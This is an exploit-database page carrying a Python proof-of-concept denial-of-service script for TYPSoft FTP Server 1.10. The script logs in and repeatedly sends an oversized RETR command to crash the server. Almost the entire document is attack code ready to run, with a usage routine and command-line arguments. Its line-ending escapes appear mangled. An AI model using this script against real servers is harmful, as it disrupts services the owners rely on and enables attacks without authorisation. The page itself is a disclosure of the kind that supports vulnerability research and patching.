[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TYPSoft FTP Server v1.10 RETR Command DoS
# Published : 2010-05-14
# Author : Jeremiah Talamantes
# Previous Title : IncrediMail (ImShExtU.dll) ActiveX Memory Corruption
# Next Title : Samba Multiple DoS Vulnerabilities
# Tested on: Windows XP, SP2 (EN)
#!/usr/bin/python
print "n#################################################################"
print "## RedTeam Security ##"
print "## TYPSoft FTP Server RETR Command DoS ##"
print "## Version 1.10 ##"
print "## ##"
print "## Jeremiah Talamantes ##"
print "## labs@redteamsecure.com ##"
print "################################################################# n"
import socket
import sys
# Description:
# RETR command overflow with no PORT specified
# Define the exploit's usage
def Usage():
print ("Usage: scriptname.py <IP> <username> <password>n")
print ("nnCredit: Jeremiah Talamantes")
print ("RedTeam Security : www.redteamsecure.com/labsn")
# Buffer
buffer="AAAA" * 496
def exploit(hostname,username,password):
i=0
while i < 10:
i=i+1
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Error: unable to connect to host")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r + ": iteration number: ",i
sock.send("USER " + username + "rn")
r=sock.recv(1024)
sock.send("PASS " + password + "rn")
r=sock.recv(1024)
sock.send("RETR " + buffer + "rn")
sock.close()
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
password=sys.argv[3]
exploit(hostname,username,password)
sys.exit(0)
# End